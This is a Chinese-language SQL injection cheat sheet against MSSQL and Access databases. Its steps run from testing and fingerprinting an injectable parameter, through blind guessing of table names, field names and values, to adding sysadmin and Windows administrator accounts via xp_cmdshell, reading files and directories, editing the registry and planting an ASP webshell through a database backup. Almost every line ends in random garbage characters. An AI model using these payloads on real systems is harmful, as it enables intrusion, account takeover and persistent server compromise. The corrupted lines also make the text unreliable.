1.判断是否有注入;and 1=1 ;and 1=2 }@g#�S@�o�
2.初步判断是否是mssql ;and user>0 �YZp�]vlm~
OH~I+=}�.
3.注入参数是字符'and [查询条件] and ''=' m*TJ@�gI*t
k12mx��R�/
4.搜索时没过滤参数的'and [查询条件] and '%25'=' $h'�>�Zvf
Go�KMi�[b�
5.判断数据库系统 ?s: 2~Ql�u
|�7G=�f9�V
;and (select count(*) from sysobjects)>0 mssql �"��gi� 1{
GSg/I.)S��
;and (select count(*) from msysobjects)>0 access N�~��M-|^L
VW�9B�Qs2w
��LtBm }0
f.u���[!�T
6.猜数据库 ;and (select Count(*) from [数据库名])>0 K�7d]�p0d'
e�+�O�0�l
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 Jm
G)=$,��
u|E�9X[%�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 5�,W�D�mhJ
e@{8�G^o>D
9.(1)猜字段的ascii值(access) {�\��-IAuM
����cX�@72
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 g�OA]..lh�
*A��N2&>Y
(2)猜字段的ascii值(mssql) �Z9 tjo�1X
KRP)y{~�o�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 Hk�;) l3oB
�!8�>tT� �
10.测试权限结构(mssql) F!yejn
�[
?gOZY\�[ma
.��e�%��B'
Nv�_"?er+y
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- <rF�Y�$
?x
:u�g���j+
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �>=U��n=Q%
�g����\
p;
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- p[-�bu��B]
�EK}�f-Xei
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- Dv�vjIY�B~
u-E�*�_%�y
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- K�cX] g*wy
@~<M_��63�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- cLe659���&
kVe_2�oQ_>
;and 1=(select IS_MEMBER('db_owner'));-- uia�-w^F e
?�k�*s!YCZ
O
WVa&8�O
Y:�X�xT�a*
11.添加mssql和系统的帐户 �`l�95I�7�
skP�2IMa75
;exec master.dbo.sp_addlogin username;-- g�4^�df%)&
;exec master.dbo.sp_password null,username,password;-- �C��Eos��`
�D�+vH�l�}
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ����E`S�Fr
hU�y\)�GsT
;exec master.dbo.xp_cmdshell 'net user username password G>0S(��M)
��u9"1�%��
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- }x�1*�4+Y1
r��z��%=qY
;exec master.dbo.xp_cmdshell 'net user username password /add';-- y2eeE �CS]
Awad!_VdHS
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- n�.$�wW
=�
�C.$�`HGv
C0F�#PXU�y
<w d+cPZQr
12.(1)遍历目录 kiFT�x
&gf
��sX,oJIt�
;create table dirs(paths varchar(100), id int) e'uI~%$NJL
?gMxGH:B.&
;insert dirs exec master.dbo.xp_dirtree 'c:\' ?5�!�>k^q�
�G6(U\VFqO
;and (select top 1 paths from dirs)>0 ;�F;`�y),�
+<P%v��� k
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ')/�yBH9mR
2�*K _RMr~
�7��.PG*q�
�w�Zm�=h8d
(2)遍历目录 ��)_nc;&%w
n1�xN:�A�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- "p~1�|��?T
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �QviH+�9��
p}N�IZ�)]$
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �*a7&v3X��
u@�$C i/J*
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ��u;Q'xuo3
b;�O|-2AR�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 T.zU�er�bO
��%Ln7{��w
Y|=/�*?�o}
F? kW{�,�*
13.mssql中的存储过程 |8b*Bn�S��
e8@@Pi<s�B
xp_regenumvalues 注册表根键, 子键 &�Q[Y&vNn�
�d�kC[��Jt
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 do9@�6[{Sv
0 ej!�!WP�
xp_regread 根键,子键,键值名 F�ss�7�xP'
YoKY&i6r}�
;exec xp_regread S/|�'g�g�C
�qm�cLG*^,
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 dM(}1%2���
�l�k6*?�EJ
xp_regwrite 根键,子键, 值名, 值类型, 值 .�4�"9o%��
NG�lX%�j4j
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 AoEG���%nT
]3C&l+m$ot
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 X'D�g=�� |
EF?@f{YY$n
xp_regdeletevalue 根键,子键,值名 zM^ux!T�=�
4w:_��4qyb
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 7���
Znr2I
H�Kk;o�G�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 dD3I.�?D�Y
MH`H[2<\!,
0SXWt?� }�
)IG���E2k|
14.mssql的backup创建webshell XU �H�u=2F
��(DCC4%w"
use model c��ZN+D D�
P"%i� 4�-S
create table cmd(str image); N�&!qu�r \
�WKFmU0RK
insert into cmd(str) values (''); �3r?B�n�f:
I�#D{6%�~
backup database model to disk='c:\l.asp'; �/�YWoDH�L
3
�[��lF�
y_$=P�u6H
H�PAd@�5d(
15.mssql内置函数 �MX �2UYZ&
'��Lft�\.C
;and (select @@version)>0 获得Windows的版本号 Uc6BI�$Fmz
kn��_%'7��
;and user_name()='dbo' 判断当前系统的连接用户是不是sa ���m-lUgx7
�Cyxt EzPp
;and (select user_name())>0 爆当前系统的连接用户 �`5;O|qRq�
#e0�t�T�+
;and (select db_name())>0 得到当前连接的数据库 !6ZkLE[XJ<
3V�b��QDPG
��ip4:p�x-
C26PQ�Go#$
16.简洁的webshell ^.F�@�yo2}
�g83�!il�\
use model ]BU,*Y�aB
�ik7�7i?Hg
create table cmd(str image); &3m���se�U
j��Yet�!�l
insert into cmd(str) values (''); &%`IPhb�T�
6>)]7�(B<d
backup database model to disk='g:\wwwtest\l.asp';
